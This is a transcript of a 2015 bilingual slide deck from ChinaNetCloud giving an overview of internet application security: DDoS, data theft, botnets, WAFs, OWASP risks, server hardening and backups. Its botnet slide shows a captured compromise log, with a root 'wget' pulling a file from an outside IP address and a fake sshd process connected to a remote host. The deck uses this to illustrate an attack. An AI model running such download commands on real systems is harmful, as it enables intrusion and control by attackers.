Internet System Security Overview
-
Upload
china-netcloud -
Category
Internet
-
view
126 -
download
5
Transcript of Internet System Security Overview
Internet Application SecuritySecuring Your System让应用的安全加固您的系统
By Steve MusheroApril, 2015
Build & Manage Servers Optimize & Manage Servers Manage Cloud Servers Copyright © 2015 ChinaNetCloud
Running the World’s Internet Servers www.ChinaNetCloud.com
Big Exciting Internet令人激动的互联网
1994
1996
1998
2000
2002
2004
2006
2008
2010
2012
2014
*
0
500
1,000
1,500
2,000
2,500
3,000
3,500
Internet Users (in millions)
Source: Internet Live StatsNote: * estimate for July 1, 2014. Growth in percentages
80%76%
73%
56%49%
47%
Running the World’s Internet Servers www.ChinaNetCloud.com
Use every day for everything每一天,时刻陪伴
Running the World’s Internet Servers www.ChinaNetCloud.com
For Every Part of Life 融入生活的每一部分
Running the World’s Internet Servers www.ChinaNetCloud.com
But not everything is happy但,不是诸事如意
Running the World’s Internet Servers www.ChinaNetCloud.com
Today’s Three Security Problems当今三大安全问题
• DDoS• Steal Data数据盗窃• Botnets僵尸网络
Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #1 – DDoS 第一安全问题- DDoS
• For Fun 捣蛋• Get Money 赚钱• Competitors 竞争
Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #2 – Stealing Data第二安全问题-数据盗窃 • Steal Money
偷钱• Steal/Sell Data
偷数据• Steal Code
偷代码
Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #3 – BotNets第三安全问题-僵尸网络
• Break In 攻入• Install Root Kit 安装• Call home for control 呼叫 • Do evil 作恶
Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
Running the World’s Internet Servers www.ChinaNetCloud.com
Where is Operations & Security ?Duang – 运维和安全在哪里 ?
Running the World’s Internet Servers www.ChinaNetCloud.com
Our Job is to Serve & Protect我们的职责就是安全代维
Running the World’s Internet Servers www.ChinaNetCloud.com
Security is Secondary, Not Important安全是次要的
Features - 特点Performance - 性能Convenience - 便捷
Security安全
Running the World’s Internet Servers www.ChinaNetCloud.com
But becoming more important但逐渐重要
P2P Lending 金融
E-Commerce
SaaS
Features - 特点Performance - 性能Convenience - 便
捷
Security安全
Running the World’s Internet Servers www.ChinaNetCloud.com
How to be Secure ?如何安全加固
Running the World’s Internet Servers www.ChinaNetCloud.com
What is the most Secure Application?什么是最安全的应用
Running the World’s Internet Servers www.ChinaNetCloud.com
Lots of pieces很多方面
• Internet – 互联网
• Firewalls - 防火墙
• Web/App Servers - 服务器
• Database - 数据库
• OS - 操作系统
• Servers / Cloud - 物理机/云
Running the World’s Internet Servers www.ChinaNetCloud.com
4 Security Zones4 大安全区域
Internet互联网
In Front ofYour
Application应用之上
InsideYour App
应用之内
UnderYour App应用之下
Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Internet互联网
Internet互联网
In Front ofYour
Application
InsideYour
Application UnderYour
Application
Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS AttacksDDoS 攻击
Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS Type 1 – Overload Bandwidth第一种类型-带宽超载
Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS Type 2 – Overload Servers第二种类型-服务器超载
Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS – Solutions防 DDoS 策略
• Cloud Filtering – Anquanbao 安全宝• CDN Support - CDN 支持• IDC Hardware - IDC 硬件
• Front of Application Blocking在应用之前阻断• Complex & Difficult - 复杂而困难
• In Application Mitigation在应用之内缓解• Caching - 缓存
Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: In Front of Your Application应用之上
Internet
In Front ofYour
Application应用之上
InsideYour
Application UnderYour
Application
Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: In Front of Your Application应用之上
Running the World’s Internet Servers www.ChinaNetCloud.com
Firewalls – Traditional防火墙 – 传统
• Required – Basic protection要求-基本的保护
• Basic filtering基本的过滤
• NAT inbound• ssh, monitoring
• NAT outbound• Backups, DNS, ntp, updates
Running the World’s Internet Servers www.ChinaNetCloud.com
WAF – Web App FirewallWAF – 网页应用防火墙
• Increasingly Required 上升的需求
• More Advanced 更加先进
• More Complex更加复杂
• Can break your Application会影响应用
• Hard to Manage难以管理
• Hard to Monitor难以监控
• Different Types 多种类型• Patterns vs. Heuristics
安全宝
Running the World’s Internet Servers www.ChinaNetCloud.com
WAF – Web App FirewallWAF – 网页应用防火墙
• Two key protections 两种主要的防护
• Protect Application Code 保护应用代码
• OWASP basics• SQL, XSS
• DDoS Filtering & Limiting 过滤和限制
• IP, agent, url, session
Running the World’s Internet Servers www.ChinaNetCloud.com
WAF – Web App Firewall - TypesWAF- 网页应用防火墙 - 类型
• Dedicated Hardware专有硬件设备• Palo Alto Networks
• Software / Virtual软件/虚拟服务• Anquanbao - 安全宝• Aliyun Cloud Shell - 云盾
• Software Module软件模块• modSecurity
安全宝
Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Inside Your Application在应用之内
Internet
InsideYour
Application在应用之内
UnderYour
Application
In Front ofYour
Application
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application在应用之内
Main App Security Problem ?APP 主要应用安全的问题是什么?
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application在应用之内
Inside YOUR Application在你的应用里面
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application在应用之内
Your Code你的代码
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application在应用之内
怎么办 ?
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application在应用之内
Write secure code写安全的代码
Running the World’s Internet Servers www.ChinaNetCloud.com
Secure Code – Difficult & Frustrating安全代码 – 又难又麻烦
Running the World’s Internet Servers www.ChinaNetCloud.com
Code – OWASP Project Resources代码 – OWASP 项目资源
• Info - 介绍• Guides - 指引• Tools - 工具
http://owasp.org.cn
Running the World’s Internet Servers www.ChinaNetCloud.com
Code – OWASP Top 10代码- 10 大应用程序风险
Key Points 要点• A1 – Injection• A2 – Auth & Session Mgmt• A3 – XSS • A7 – Function ACLs• A8 – CSRF• A9 – Insecure Components
http://owasp.org.cn
Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application – App Scanning在应用之内- APP 扫描
• Best practice最佳实践
• Find new problems找到新问题• As you update
更新• Third parties
第三方
• New exploits新的改进
Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Under Your Application在应用之下
Internet
UnderYour
Application在应用之下
In Front ofYour
Application
InsideYour
Application
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application ?在应用之下
什么意思?
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud & Servers在应用之下-云 & 物理服务器
• Services• Servers & OS• Cloud• Network
• 服务软件• 服务器和操作系统• 云• 网络
Running the World’s Internet Servers www.ChinaNetCloud.com
Cloud & Servers – Love & Respect Them在应用之下-需要被关注
• Often forgotten经常被遗忘
• Often use defaults经常采取默认设置
• Or random Google search或用谷歌搜索配置
• Source of great danger风险的发源地
Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Web Servers服务-网页服务器
• Best practices最佳实践
• Lots of small issues许多细小问题• Running user - 用户运行
• File permissions - 文件许可
• Dangerous uploads - PHP inside JPEGs !危险的上传
• SSL – Heartbleed, etc.
Running the World’s Internet Servers www.ChinaNetCloud.com
Services – App Servers服务- APP 服务器
• Best Practices最佳实践
• Delete example APPs删除样例
• Delete tools (Tomcat)删除工具
• Patch Software (Java!) 软件补丁
Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Database Servers服务- 数据库服务器
• Use Best Practices最佳实践
• Secure Configuration安全配置
• Limited User Permission限制用户许可
• Separate App & DBA User区分 APP 和 DBA 用户
Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Database Servers服务- 数据库服务器
• Separate User for each App 区分每个 APP 的用户
• Safe File Permissions 安全的文件许可
• Log SQL if possible 尽可能记录 SQL
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Server & OS应用之下-服务器 & 操作系统
• Hardened OS加固
• Iptables防火墙
• Run Users用户运行
• File permissions文件许可
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Server & OS应用之下-服务器 & 操作系统
• Logging日志
• Scanning (ClamAV)扫描
• Track activity轨迹追踪
• Automate自动
• System Updates系统升级
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud应用之下-云
• Best Practices最佳实践
• Control Access 控制登录权限
• Can delete EVERYTHING会被意外删除
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud应用之下-云
• Separate Backups备份隔离
• Out of Cloud在云之外
• MFA Delete on AWS• AWS 上删除 MFA
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Network应用之下-网络
• Generally okay, BUT
• VPC on Clouds – Separate 使用公共云上隔离的私有网络
• Consider Out-of-Band Link (DDoS)考虑带外数据链接
Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Network应用之下-网络
• Firewalls – Front & Middle防火墙-前端 &中间
• Secure Configuration安全配置
• Separate test/dev network区分测试/开发
Running the World’s Internet Servers www.ChinaNetCloud.com
Backups as Security备份即安全
• Backups ARE part of Security
备份属于安全管理的范畴• If all else fails, use backups
若发生意外,使用备份
• Keep them Secure安全备份
• Avoid Theft & Tampering 防止盗窃或恶意企图• Read-Only is Best 最好采用只读
Running the World’s Internet Servers www.ChinaNetCloud.com
Security Monitoring安全监控
Running the World’s Internet Servers www.ChinaNetCloud.com
Audit is also Important审计也很重要
Deep Check to Find Problems 深入检查 , 发现问题
Running the World’s Internet Servers www.ChinaNetCloud.com
Summary总结
• Security is Critically Important 安全非常重要• Increasingly Important 并且,越来越重要• Getting Harder 但也,越来越难• But more Tools 但,实用工具越来越多• Details & Experts Help 注重细节,并且需要专家帮助!
Running the World’s Internet Servers www.ChinaNetCloud.com
How can ChinaNetCloud help ?云络怎么帮您?
Running the World’s Internet Servers www.ChinaNetCloud.com
We Manage All of this for you我们为你管理好一切
• Deep Experience 丰富经验• Experts at Every Level 全面专业• Part of Overall
Operations 是运维工作的一部分
Running the World’s Internet Servers www.ChinaNetCloud.com
Thank you!谢谢
Running the World’s Internet Servers www.ChinaNetCloud.com
Thanks from ChinaNetCloud来自云络的感谢
Pioneers in OaaS – Operations as a Service运维即服务的先锋团队
ChinaNetCloud [email protected]
www.ChinaNetCloud.com
Beijing Office:
北京办公室Lee World Business Building #305
57 Happiness Village Road, Chaoyang District
朝阳区幸福村中路 57号利世商务楼 305室Beijing, 100027 China
Silicon Valley Office:
硅谷办公室
California Avenue
Palo Alto, 94123 USA
Shanghai Headquarters:
上海办公室
X2 Space 1-601, 1238 Xietu Lu
Shanghai, 200032 China 斜土路 1238号 X2空间 1号楼 601室
T: +86-21-6422-1946 F: +86-21-6422-4911